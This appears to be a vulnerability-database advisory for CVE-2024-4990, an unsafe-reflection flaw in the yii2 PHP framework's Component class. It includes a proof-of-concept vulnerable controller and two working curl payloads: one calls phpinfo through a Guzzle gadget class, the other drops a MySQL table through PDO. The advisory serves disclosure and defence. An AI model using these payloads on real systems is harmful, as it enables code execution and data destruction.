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CVE-2024-4990 yiisoft/yii2

Package

Manager: composer
Name: yiisoft/yii2
Vulnerable Version: >=0 <2.0.49.4

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00088 pctl0.26166

Details

Unsafe Reflection in base Component class in yiisoft/yii2 Yii2 supports attaching Behaviors to Components by setting properties having the format `'as <behaviour-name>'`. Internally this is done using the `__set()` magic method. If the value passed to this method is not an instance of the `Behavior` class, a new object is instantiated using `Yii::createObject($value)`. However, there is no validation check that verifies that `$value` is a valid `Behavior` class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods. ### Impact With some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables ### Patches Not yet patched. ### Workarounds No Work around available ### References Reported [Here](https://huntr.com/bounties/4fbdd965-02b6-42e4-b57b-f98f93415b8f?token=3bcfc5266870680af19a26170b8dbf3750e3b593ce192da8eaa6a03f96b99b52c419e15768c56f23991dc50003aa1a9e3cb3f1f9321e18bd506d68a9f937cd5b7ca90fb47967df22c8768c0c48f7206f36b583464af7e44bf93eecc5398a2764b98e02cf8e280397785106db16e4197951554eb9b9c46649f4339e2f413cf6a0197ab2e0) in case the link is dead, here is the full description # Description Yii2 supports attaching Behaviors to Components by setting properties having the format `'as <behaviour-name>'`. Internally this is done using the `__set()` magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using `Yii::createObject($value)`. However, there is no validation check that verifies that `$value` is a valid Behavior class name or configuration. An attacker that can control the content of the `$value` variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods. Depending on the installed dependencies various kind of attacks are possible. # Proof of Concept A PoC application was created using `composer create-project`, as specified in the [getting started](https://www.yiiframework.com/doc/guide/2.0/en/start-installation). Yii JSON parser was enabled in the configuration: ```php 'parsers' => [ 'application/json' => 'yii\web\JsonParser' ] ``` A vulnerable controller was added: ```php <?php namespace app\controllers; use yii\base\Component; use yii\web\Controller; class ExploitableController extends Controller { public function beforeAction($action): bool { // Needed only to simplify the PoC $this->enableCsrfValidation = false; return parent::beforeAction($action); } public function actionVulnerable(): string { $fields = $this->request->post(); $myComponent = new Component(); foreach ($fields as $key => $value) { $myComponent->$key = $value; } return ""; } } ``` ## Executing phpinfo() Following command stores the content of `phpinfo()` inside info.html: ```bash curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html ``` It leverages the fact that `GuzzleHttp\Psr7\FnStream` class executes `call_user_func($this->_fn_close)` inside `__destruct()`. This class is a default dependency. ## Executing arbitrary MySQL queries (blind execution) If the application is connected to a MySQL database it is possible to exploit the `PDO` class to execute arbitrary SQL queries: ```bash curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable ``` Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (i.e. "Table 'test.foo' doesn't exist"), depending on the app configuration. # Impact It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit). The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access. # Occurrences [Component.php L191](https://github.com/yiisoft/yii2/blob/2.0.48/framework/base/Component.php#L191)

Metadata

Created: 2024-06-02T22:30:39Z
Modified: 2025-04-01T23:13:58Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-cjcc-p67m-7qxm/GHSA-cjcc-p67m-7qxm.json
CWE IDs: ["CWE-470"]
Alternative ID: GHSA-cjcc-p67m-7qxm
Finding: F004
Auto approve: 1